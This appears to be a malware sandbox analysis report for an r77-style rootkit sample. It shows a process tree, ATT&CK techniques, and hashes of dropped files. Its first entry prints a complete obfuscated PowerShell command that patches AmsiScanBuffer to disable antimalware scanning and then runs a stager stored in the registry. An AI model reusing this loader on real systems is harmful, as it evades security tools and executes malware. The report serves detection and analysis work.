C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:fRpkfPiAoWEH{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$NxRCfbzCQiPVFw,[Parameter(Position=1)][Type]$htOeTWhgve)$mOsfbwnsqLV=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'fle'+[Char](99)+''+'t'+''+[Char](101)+'d'+'D'+'e'+[Char](108)+''+[Char](101)+'ga'+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+[Char](101)+'m'+'o'+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+'du'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'yDe'+[Char](108)+''+[Char](101)+'ga'+[Char](116)+'eTy'+'p'+'e','C'+'l'+'a'+'s'+''+'s'+''+','+''+[Char](80)+''+[Char](117)+'b'+'l'+'ic'+','+'S'+'e'+'a'+[Char](108)+'ed,'+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+'la'+[Char](115)+'s,'+'A'+'ut'+'o'+''+[Char](67)+''+[Char](108)+''+'a'+'ss',[MulticastDelegate]);$mOsfbwnsqLV.DefineConstructor(''+'R'+'T'+[Char](83)+'p'+[Char](101)+''+[Char](99)+''+'i'+''+'a'+''+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+'e'+[Char](44)+''+'H'+''+'i'+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$NxRCfbzCQiPVFw).SetImplementationFlags('Ru'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+''+[Char](110)+'ag'+[Char](101)+''+'d'+'');$mOsfbwnsqLV.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+'o'+'k'+'e'+'',''+[Char](80)+'u'+[Char](98)+''+'l'+''+'i'+''+'c'+','+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+'ig'+[Char](44)+'New'+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+','+'V'+[Char](105)+''+[Char](114)+'tu'+[Char](97)+''+[Char](108)+'',$htOeTWhgve,$NxRCfbzCQiPVFw).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+'n'+''+'a'+''+[Char](103)+'ed');Write-Output $mOsfbwnsqLV.CreateType();}$ZzcpjmtgDDhQn=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+'t'+'e'+''+[Char](109)+'.'+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+'r'+''+'o'+''+'s'+'o'+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+'f'+'e'+[Char](78)+''+[Char](97)+''+'t'+''+'i'+''+'v'+''+'e'+''+[Char](77)+''+'e'+''+'t'+''+'h'+''+[Char](111)+''+[Char](100)+''+'s'+'');$batozsqAwesqjz=$ZzcpjmtgDDhQn.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+'roc'+[Char](65)+''+[Char](100)+'d'+[Char](114)+''+'e'+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+'ic'+','+''+[Char](83)+''+'t'+''+'a'+''+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ZMNxjthqpOeSuLgUmWY=fRpkfPiAoWEH @([String])([IntPtr]);$DFpSBJIHUSYKXsKObZKMgf=fRpkfPiAoWEH @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$XBnSZNJgWfV=$ZzcpjmtgDDhQn.GetMethod(''+'G'+'e'+[Char](116)+''+[Char](77)+''+[Char](111)+'d'+'u'+''+[Char](108)+''+[Char](101)+''+'H'+''+[Char](97)+'n'+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+'n'+'el'+'3'+''+[Char](50)+''+[Char](46)+''+'d'+'l'+[Char](108)+'')));$bihHcKIBTCtPgR=$batozsqAwesqjz.Invoke($Null,@([Object]$XBnSZNJgWfV,[Object](''+[Char](76)+''+[Char](111)+''+'a'+'d'+'L'+''+[Char](105)+''+[Char](98)+'r'+'a'+''+[Char](114)+''+'y'+''+[Char](65)+'')));$anZRySvjrybvZPMXY=$batozsqAwesqjz.Invoke($Null,@([Object]$XBnSZNJgWfV,[Object](''+[Char](86)+'ir'+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'P'+[Char](114)+''+[Char](111)+'te'+[Char](99)+''+'t'+'')));$JSwBKMs=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bihHcKIBTCtPgR,$ZMNxjthqpOeSuLgUmWY).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+'dl'+[Char](108)+'');$frbfRBlHuZIjaJheh=$batozsqAwesqjz.Invoke($Null,@([Object]$JSwBKMs,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](83)+'ca'+[Char](110)+''+'B'+''+[Char](117)+''+'f'+'f'+[Char](101)+''+'r'+'')));$epLQDxCTqo=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($anZRySvjrybvZPMXY,$DFpSBJIHUSYKXsKObZKMgf).Invoke($frbfRBlHuZIjaJheh,[uint32]8,4,[ref]$epLQDxCTqo);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$frbfRBlHuZIjaJheh,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($anZRySvjrybvZPMXY,$DFpSBJIHUSYKXsKObZKMgf).Invoke($frbfRBlHuZIjaJheh,[uint32]8,0x20,[ref]$epLQDxCTqo);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+'F'+[Char](84)+''+'W'+''+[Char](65)+''+'R'+''+'E'+'').GetValue(''+[Char](36)+''+[Char](55)+''+'7'+'sta'+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4856

C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4056

C:\Users\Admin\AppData\Roaming\$77-penisware.exe
C:\Users\Admin\AppData\Roaming\$77-penisware.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1180

C:\Windows\helppane.exe
C:\Windows\helppane.exe -Embedding
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:3228

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528884
2⤵
PID:4588

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=4004,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=3720 /prefetch:1
1⤵
PID:372

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=4732,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=5156 /prefetch:1
1⤵
PID:2652

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --field-trial-handle=5052,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=5296 /prefetch:1
1⤵
PID:1904

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=5320,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=5504 /prefetch:8
1⤵
PID:4056

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --field-trial-handle=5456,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=5580 /prefetch:8
1⤵
PID:3188

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --field-trial-handle=5960,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=5956 /prefetch:1
1⤵
PID:1916

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5196,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=5884 /prefetch:8
1⤵
PID:1708

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --field-trial-handle=6112,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=6072 /prefetch:1
1⤵
PID:1392

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --field-trial-handle=5928,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=5268 /prefetch:1
1⤵
PID:5080

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6304,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=6348 /prefetch:8
1⤵
PID:5180

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6292,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=6460 /prefetch:8
1⤵
- Modifies registry class
PID:5188

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --field-trial-handle=6288,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=5904 /prefetch:1
1⤵
PID:5252

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
PID:5424

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=124.0.6367.118 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=124.0.2478.80 --initial-client-data=0x258,0x25c,0x260,0x254,0x27c,0x7fffa353ceb8,0x7fffa353cec4,0x7fffa353ced0
2⤵
PID:5460

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2268,i,306063723597900612,1618431102234461167,262144 --variations-seed-version --mojo-platform-channel-handle=2264 /prefetch:2
2⤵
PID:5728

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1916,i,306063723597900612,1618431102234461167,262144 --variations-seed-version --mojo-platform-channel-handle=3232 /prefetch:3
2⤵
PID:5736

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2288,i,306063723597900612,1618431102234461167,262144 --variations-seed-version --mojo-platform-channel-handle=3452 /prefetch:8
2⤵
PID:5812

C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4364,i,306063723597900612,1618431102234461167,262144 --variations-seed-version --mojo-platform-channel-handle=4420 /prefetch:8
2⤵
PID:4948

C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4364,i,306063723597900612,1618431102234461167,262144 --variations-seed-version --mojo-platform-channel-handle=4420 /prefetch:8
2⤵
PID:3892

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3508,i,306063723597900612,1618431102234461167,262144 --variations-seed-version --mojo-platform-channel-handle=4432 /prefetch:8
2⤵
PID:1696

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4460,i,306063723597900612,1618431102234461167,262144 --variations-seed-version --mojo-platform-channel-handle=4148 /prefetch:8
2⤵
PID:5280

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4732,i,306063723597900612,1618431102234461167,262144 --variations-seed-version --mojo-platform-channel-handle=4736 /prefetch:8
2⤵
PID:1316

C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\elevation_service.exe"
1⤵
PID:5852

C:\Users\Admin\AppData\Roaming\$77-scchost.exe
C:\Users\Admin\AppData\Roaming\$77-scchost.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1656

C:\Users\Admin\AppData\Roaming\$77-penisware.exe
C:\Users\Admin\AppData\Roaming\$77-penisware.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5760

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4448

C:\Windows\regedit.exe
"C:\Windows\regedit.exe"
1⤵
- Runs regedit.exe
- Suspicious behavior: GetForegroundWindowSpam
PID:4084

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77-penisware.exe.log
Filesize
654B

MD5
2ff39f6c7249774be85fd60a8f9a245e

SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e

SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77-scchost.exe.log
Filesize
1KB

MD5
183dd1cd0014293865e135951d0197ab

SHA1
268bba2c9c82727b1b32857e67ec26af46ad4cc6

SHA256
2f46685bdaf0f2e29ea07f3967a99785e9eab1add962f357acfc68b53545057e

SHA512
c6fb59e54c4934bd4018ac404a7cd4d5ab6f1687b8e73c9a54d16f0158381f0d8c41160cd8f7f11ecff0da84f3b278beb5a224c7423a8623be617cf7ec63b271

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json
Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
Filesize
2KB

MD5
d9c7d39c7bffea1b1e7f406744c72257

SHA1
6faea4bc43874655ea6b9eb0b2773c2c1684d7dd

SHA256
352c6424794af58a9c30403b3c725c280c2e03a87e58923e888a189aa4c568ce

SHA512
834ad46b08bcbfb0625a5c5b12c126e141946458b7280859c60e3c76c8aee7260b8137c30db6e9c7e78340e8c06d01788531acaf710368e59d06a48ef6f0750d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports
Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries
Filesize
40B

MD5
20d4b8fa017a12a108c87f540836e250

SHA1
1ac617fac131262b6d3ce1f52f5907e31d5f6f00

SHA256
6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

SHA512
507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
11KB

MD5
ab342cec039c39b41deec188abd85e5b

SHA1
e7a817c0650cb7d0c9e654b35a381f552c1cff72

SHA256
638df312904e77ead9fc391231bbb43f3f594d29a8f80b39b1248f7ec0a0fba0

SHA512
1c4769993df16750978d85321dc7b2b3c916b736b6b32797d1b764a9072271a1311e5c0d815b14bbabb3bce36e30c5208836635f77add16a34358e0afd9c09eb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
Filesize
30KB

MD5
f8c0cc0a68ed22dee319ebbb70bce669

SHA1
91bc00d932b728935a8b1da95317be39eb2ff32a

SHA256
1d1b26a8b03ec00778f11cb135a38b1dc7858dee5b0c7c840398a6e10fae5243

SHA512
d5af75636561fc0574e820287e62b290fde34500056e63da48e54cb04e94b07e0761cfe8eee6b82f7e9285a1ab378314af7c613a72434351646b5a1cd8eb1884

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
56KB

MD5
6c010b02317bdddd23944282642ec796

SHA1
05504f29b249e87c1ad8276e7e0bd9f9eaf48c04

SHA256
f53f48a6a05f697d5d8b64d78dbacfca1b379bff9938e8fe9015c6d5546d06b1

SHA512
4fc92332bd41ecde2e54fcb08992902f220c172f52aca2842ba03a8c857b770c4cad78a73f2fbc1013506c9c2d56fc459e7ea92ea1622b617947a5b29c32b53d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
66KB

MD5
8b2c2e04a2298d528e8097a085cfdd05

SHA1
5f383d37f02ee89276724c13e8d50d12232bd40d

SHA256
c0b018c7ae80444cf0b3cce47182157f64794b874ad25539292ecce3c0415f4f

SHA512
b52892eb9502184b35006cc8529297e73c1fa099bbafaf1e326b58038702af7f8a6071062d16cf8b85241803a98f8d278a12ee62bae44f86910c33787b9bda13

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp829.tmp.bat
Filesize
154B

MD5
f9968ce2fc9f76c50aab6dd2c3946135

SHA1
8ad6731b10344ce061c20da7cc804db708518955

SHA256
4c61e1af995654525db973afdecb946a581d207ab3362239ab1bf453ab1c2e49

SHA512
32edad9cbec8fb20898f7580e7dadb05ddc97853b38e076843cad89199e3b0fbd58f2787c8d6a1817938d61feb78012474314b3dfd05c4633b6448a1002277d0

Download Submit
C:\Windows\Resources\$77-install.exe
Filesize
163KB

MD5
1a7d1b5d24ba30c4d3d5502295ab5e89

SHA1
2d5e69cf335605ba0a61f0bbecbea6fc06a42563

SHA256
b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5

SHA512
859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa

Download Submit
C:\Windows\Resources\$77-penisware.exe
Filesize
443KB

MD5
d2b0fd7476f280dc1d8d085d693b37f8

SHA1
6d8cd2158d77f33b7c320984cedbbf3ac7c8513c

SHA256
c05c71085a3ff83980a530aa77c500b98610f4e934315b6831448b96a45d9067

SHA512
d3fd2bfe426b9c9a1c83e3b03fd0f6c32e07c236116f4319305adbe8e323be506cc92a390e7d86e0355618df995474455c26f8de24831283902e90c38853bf41

Download Submit
C:\Windows\Resources\$77-penisware2.exe
Filesize
256KB

MD5
18f497deffe88b6b2cff336a277aface

SHA1
4e1413241d3d3e4dbff399d179f8fd64f3ecd39e

SHA256
8133c3c1e5dde7c9b4d9d5c9a07e37b733fd0223fc9d035c3f386f034a434af5

SHA512
35c804ec73001fe66d57bd2fadc51cd399edbc2e550c4257f29aac5a24a9f9c030c582d50239dec41605801263fd5739444aa14f9683f99f726152cc1bb6920d

Download Submit
C:\Windows\Resources\$77-scchost.exe
Filesize
545KB

MD5
9c17bdda52e21d8df835cee315b506dd

SHA1
f01ccf02c4b92dc8e261da1e48f54ccd548c8af0

SHA256
f8bcd12f0b30a378747069cc28aaae74d30aafc33656152ee34f818a10e8973f

SHA512
7acd79e169949ef7445230ea474a38786cda317469be340fa94b83dcf26b0025b0baff45ff37c88c632ceaef6565a503d7f19d3884c467f8d68c28f86c3f9889

Download Submit
C:\Windows\Resources\$77-sdchost.exe
Filesize
508KB

MD5
3f7291a1225138608a020a1e3ccc4740

SHA1
77bc47fd739a3efb3f22b590b6acb4e101d78c61

SHA256
b07657bb984766acf4f99a7645f6da9a251e2dc3afc839a6ae7f049605b87011

SHA512
03c622b528930e70d103a7ccfe8405cea333e5801a8bded99555bb58819b67ee5dcdb0861a3bc17afd5903b392f0a7a766047dbccd1674203c61238cd65f39e7

Download Submit
C:\Windows\Temp\__PSScriptPolicyTest_4f0veh3h.5ea.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
\??\pipe\crashpad_5424_ASYXDVEZSJUHSFQR
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/220-47-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/220-51-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/220-45-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/220-46-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/220-44-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/972-107-0x000001E1404C0000-0x000001E1404EB000-memory.dmp

Filesize
172KB

Download
memory/1212-16-0x00000000008B0000-0x0000000000926000-memory.dmp

Filesize
472KB

Download
memory/1212-78-0x0000000001170000-0x000000000119B000-memory.dmp

Filesize
172KB

Download
memory/1960-96-0x0000025A13FE0000-0x0000025A1400B000-memory.dmp

Filesize
172KB

Download
memory/1960-102-0x0000025A13FE0000-0x0000025A1400B000-memory.dmp

Filesize
172KB

Download
memory/1960-103-0x00007FFF8AB10000-0x00007FFF8AB20000-memory.dmp

Filesize
64KB

Download
memory/2492-20-0x00000000008A0000-0x00000000008E6000-memory.dmp

Filesize
280KB

Download
memory/2492-88-0x000000001B970000-0x000000001B99B000-memory.dmp

Filesize
172KB

Download
memory/2492-21-0x0000000000F80000-0x0000000000F86000-memory.dmp

Filesize
24KB

Download
memory/3548-56-0x000002563A480000-0x000002563A4A5000-memory.dmp

Filesize
148KB

Download
memory/3548-65-0x00007FFF8AB10000-0x00007FFF8AB20000-memory.dmp

Filesize
64KB

Download
memory/3548-64-0x000002563A4B0000-0x000002563A4DB000-memory.dmp

Filesize
172KB

Download
